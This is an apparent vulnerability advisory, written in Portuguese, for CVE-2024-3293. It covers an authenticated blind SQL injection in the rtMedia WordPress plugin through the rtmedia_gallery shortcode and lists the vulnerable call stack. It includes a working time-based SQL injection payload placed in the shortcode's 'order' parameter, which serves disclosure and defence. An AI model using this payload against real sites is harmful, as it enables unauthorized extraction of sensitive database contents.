
CVE-2024-3293 rtMedia para WordPress, BuddyPress e bbPress <= 4.6.18 - Injeção de SQL autenticada (Contribuidor+) via shortcode rtmedia_gallery
rtMedia for WordPress, BuddyPress and bbPress <= 4.6.18 - Injeção de SQL autenticada (Contribuidor+) via shortcode rtmedia_gallery
Description
O plugin rtMedia for WordPress, BuddyPress and bbPress para WordPress é vulnerável a Injeção SQL cega por meio do shortcode rtmedia_gallery em todas as versões até, e incluindo, a 4.6.18, devido ao escape insuficiente no parâmetro fornecido pelo usuário e à falta de preparação suficiente na consulta SQL existente. Isso possibilita que atacantes autenticados, com acesso de nível contribuidor ou superior, anexem consultas SQL adicionais a consultas já existentes, que podem ser usadas para extrair informações sensíveis do banco de dados.
PILHA DE CHAMADAS
RTMediaModel->get (\buddypress-media\app\helper\RTMediaModel.php:61)
RTMediaModel->get_media (\buddypress-media\app\helper\RTMediaModel.php:227)
RTMediaQuery->populate_media (\buddypress-media\app\main\routers\query\RTMediaQuery.php:869)
RTMediaQuery->populate_data (\buddypress-media\app\main\routers\query\RTMediaQuery.php:993)
RTMediaQuery->get_data (\buddypress-media\app\main\routers\query\RTMediaQuery.php:1214)
RTMediaQuery->query (\buddypress-media\app\main\routers\query\RTMediaQuery.php:684)
RTMediaQuery->__construct (\buddypress-media\app\main\routers\query\RTMediaQuery.php:184)
RTMediaGalleryShortcode::render (\buddypress-media\app\main\controllers\shortcodes\RTMediaGalleryShortcode.php:271)
Payload:
[rtmedia_gallery global="true" album_id="57" order_by="ratings" order=",media_id,(select 1 from (select sleep(IF(1=1,5,0)))x)"]


Payload verdadeiro:

Payload falso:
